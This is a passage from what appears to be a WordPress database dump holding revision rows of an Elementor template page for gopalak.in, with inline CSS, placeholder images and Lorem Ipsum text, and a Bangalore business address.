.elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:40','2022-09-30 06:56:40','',1373,'https://gopalak.in/?p=1504',0,'revision','',0),(1505,1,'2022-09-30 12:26:40','2022-09-30 06:56:40','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 12:26:40','2022-09-30 06:56:40','',1373,'https://gopalak.in/?p=1505',0,'revision','',0),(1506,1,'2022-09-30 12:26:41','2022-09-30 06:56:41','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion 